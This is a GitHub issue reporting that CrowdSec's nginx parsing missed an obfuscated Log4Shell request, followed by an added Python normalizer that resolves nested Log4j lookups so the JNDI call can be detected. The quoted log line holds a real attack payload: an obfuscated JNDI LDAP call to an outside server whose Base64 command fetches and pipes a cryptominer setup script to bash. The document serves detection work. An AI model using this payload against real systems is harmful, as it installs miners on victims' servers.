crowdsecurity/hub

missing log4j pattern bypass

yanbreu opened this issue · 0 comments

Describe the bug
My IDS detected a Log4j attempt, but crowdsec didn't.
I hope this is the right place to report this.

To Reproduce
Nginx Log:

1.2.3.4 - - [11/Dec/2023:04:41:01 +0100] "GET / HTTP/1.1" 200 3 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')"

cscli explain:

/ # cscli explain --dsn file://tmp/nginx.log --type nginx
line: 1.2.3.4 - - [11/Dec/2023:04:41:01 +0100] "GET / HTTP/1.1" 200 3 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')"
        ├ s00-raw
        |       ├ 🔴 crowdsecurity/cri-logs
        |       ├ 🔴 crowdsecurity/docker-logs
        |       ├ 🟢 crowdsecurity/non-syslog (+5 ~8)
        |       └ 🔴 crowdsecurity/syslog-logs
        ├ s01-parse
        |       ├ 🔴 LePresidente/authelia-logs
        |       └ 🟢 crowdsecurity/nginx-logs (+22 ~2)
        ├ s02-enrich
        |       ├ 🟢 crowdsecurity/dateparse-enrich (+2 ~2)
        |       ├ 🟢 crowdsecurity/geoip-enrich (+10)
        |       ├ 🟢 crowdsecurity/http-logs (+6)
        |       └ 🟢 crowdsecurity/whitelists (unchanged)
        ├-------- parser success 🟢
        ├ Scenarios
                └ 🟢 crowdsecurity/http-crawl-non_statics

Expected behavior
Request should get flagged and blocked.

Additional context
See Suricata rule:
https://github.com/ptresearch/AttackDetection/blob/master/Log4Shell/log4shell.rules#L1
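The logged request shows why a literal `jndi:` match on the raw line misses: Log4j 2 evaluates nested `${...}` lookups inside-out before it ever sees the outer one, so `${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//...` only becomes `${jndi:ldap://...}` after the inner lookups fall through to their `:-` defaults. A detector that wants to catch this has to do the same normalization before matching. The following is an added example written for this page, not code from the issue and not the crowdsec hub's nginx parser or any hub scenario. It undoes nginx's `\xHH` log escaping and one layer of URL encoding, folds `lower:`/`upper:` lookups and any lookup carrying a default (`env:`, `sys:`, `::-`, ...) to what Log4j would substitute, and then searches for `${jndi:<scheme>:<target>}`. The sample log lines are constructed; only the first mirrors the report's obfuscation shape, with the Base64 payload shortened. It assumes, as the attacker did, that the environment keys used (`NaN` here) are unset, so the default text is what Log4j emits.

```python
import re
from urllib.parse import unquote

# Constructed sample nginx access-log lines. The first reproduces the nested
# ${env:NaN:-x} obfuscation shape from the report (payload shortened);
# the others are made up to exercise the plain, URL-encoded and benign cases.
SAMPLE_LINES = [
    '1.2.3.4 - - [11/Dec/2023:04:41:01 +0100] "GET / HTTP/1.1" 200 3 '
    '"t(\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}'
    '//174.138.82.190:1389/TomcatBypass/Command/Base64/AAAA}\')" "-"',
    '5.6.7.8 - - [11/Dec/2023:04:42:13 +0100] "GET /?x=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '9.9.9.9 - - [11/Dec/2023:04:43:00 +0100] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 200 1 "-" "curl/8.0"',
    '10.0.0.1 - - [11/Dec/2023:04:44:00 +0100] "GET /index.html HTTP/1.1" 200 512 "https://example.org/" "Mozilla/5.0"',
]

# nginx (escape=default) writes '"', '\' and non-printable bytes as \xHH.
NGINX_HEX = re.compile(r'\\x([0-9A-Fa-f]{2})')
# Innermost Log4j lookup: a ${...} whose body contains no further ${ or }.
INNER = re.compile(r'\$\{([^${}]*)\}')
# A JNDI lookup once obfuscation is resolved: ${jndi:<scheme>:[//]<target>}
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([A-Za-z]+)\s*:\s*(?://)?([^}]*)', re.I)


def nginx_unescape(s: str) -> str:
    """Undo nginx's \\xHH log escaping."""
    return NGINX_HEX.sub(lambda m: chr(int(m.group(1), 16)), s)


def _resolve(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would for an attacker-
    controlled string: lower/upper transform their key; any lookup carrying a
    ':-default' (env:, sys:, date:, '::-', ...) is assumed unresolvable and
    yields its default; anything else (notably jndi:) is kept literally."""
    body = m.group(1)
    expr, has_default, default = body.partition(':-')
    prefix, _, key = expr.partition(':')
    prefix = prefix.strip().lower()
    if prefix == 'lower':
        return key.lower()
    if prefix == 'upper':
        return key.upper()
    if has_default:
        return default
    return m.group(0)


def normalize(line: str, max_rounds: int = 16) -> str:
    """Decode log/URL escaping, then resolve nested lookups inside-out until
    the string stops changing (bounded so hostile input cannot spin)."""
    s = unquote(nginx_unescape(line))
    for _ in range(max_rounds):
        resolved = INNER.sub(_resolve, s)
        if resolved == s:
            break
        s = resolved
    return s


def find_jndi(line: str):
    """Return (scheme, target) for a JNDI lookup hidden in the line, else None."""
    m = JNDI.search(normalize(line))
    if m is None:
        return None
    return m.group(1).lower(), m.group(2)


def scan(lines):
    """Map each line carrying a JNDI lookup to (client_ip, scheme, target)."""
    hits = []
    for line in lines:
        hit = find_jndi(line)
        if hit is not None:
            hits.append((line.split(' ', 1)[0],) + hit)
    return hits


if __name__ == '__main__':
    for ip, scheme, target in scan(SAMPLE_LINES):
        print(f'{ip}: jndi via {scheme} -> {target}')
```

Running the block prints one hit per malicious sample, including the report's line resolved to `ldap` and `174.138.82.190:1389/...`, while the benign line is ignored. The normalizer is a heuristic, not a Log4j reimplementation: it handles one layer of URL encoding and the lookup forms seen in the wild, and a payload wrapped in a second encoding layer or split across several request fields would need the same treatment applied to each field before matching.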